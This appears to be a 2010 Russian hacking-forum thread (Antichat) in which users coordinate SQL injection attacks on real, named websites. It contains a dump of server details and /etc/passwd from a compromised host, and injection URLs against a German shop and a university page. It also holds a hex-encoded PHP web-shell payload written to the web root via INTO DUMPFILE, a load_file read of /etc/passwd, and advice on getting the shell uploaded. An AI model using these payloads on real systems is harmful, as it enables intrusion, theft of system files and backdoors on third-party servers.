ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12131  
Старый 23.03.2010, 20:06
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
database(): od4
@@basedir: /usr/
@@tmpdir: /tmp/
version(): 5.0.77
user(): root@localhost           <====
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu

-----------------------------------------
File [/etc/passwd] size: - 1759 bytes
-----------------------------------------

 root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/

...
-----------------------------------------
File [/etc/httpd/conf/httpd.conf] size: - 39844 bytes
-----------------------------------------

 #
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2/> for detailed inf

...
 
Ответить с цитированием

  #12132  
Старый 23.03.2010, 21:17
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Что значет есле при выходе SQL injection в низу написанно
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
типа You have an error in your SQL syntax;...................

[TEP STOP]

и разкрутить неразу не удалось.. что это может быть?
HELP !"
 
Ответить с цитированием

  #12133  
Старый 23.03.2010, 21:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

вроде второй раз уже спрашиваешь, дай живой пример, какая тебе разница, если сам раскрутить не можешь, и телепатировать не придется
 
Ответить с цитированием

  #12134  
Старый 24.03.2010, 00:18
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет
_http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27
 
Ответить с цитированием

  #12135  
Старый 24.03.2010, 00:35
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет
_http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27
Это почти безнадежно, там SQLi в лимите. Насколько знаю в таких случаях возможно использование только into outfile и то если будут права и будеш знать полный путь.
Ну а [XT SQL Error] это типа предупреждение вшитое самими разработчиками xt:Commerce.
 
Ответить с цитированием

  #12136  
Старый 24.03.2010, 15:08
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

помояите залить шелл поjaлуста..

Цитата:
http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,0x3C3F696E636C75646528245F4 745545B22636D64225D293B3F3E,5,6,7,8,9,10,11,12+fro m+mysql.user+INTO+DUMPFILE+%27/var/www/enswww/11.php%27
Цитата:
http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,0x3C3F696E636C75646528245F4 745545B22636D64225D293B3F3E,5,6,7,8,9,10,11,12+fro m+mysql.user+INTO+DUMPFILE+%27/var/www/enswww/People/11.php%27
не получаеться..
 
Ответить с цитированием

  #12137  
Старый 24.03.2010, 16:34
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

2 LokbatanLi
там меджики.
 
Ответить с цитированием

  #12138  
Старый 24.03.2010, 18:22
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от $n@ke  
2 LokbatanLi
там меджики.
ну на самом деле можно попробовать еще вот этот способ...

http://forum.antichat.ru/threadnav43966-4-10.html
 
Ответить с цитированием

  #12139  
Старый 24.03.2010, 18:57
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,load_file(0x2f6574632f70617 3737764),5,6,7,8,9,10,11,12
неужели там хеши?
 
Ответить с цитированием

  #12140  
Старый 24.03.2010, 20:13
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Почему user() иногда возвращает кавычку?

Код:
'@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ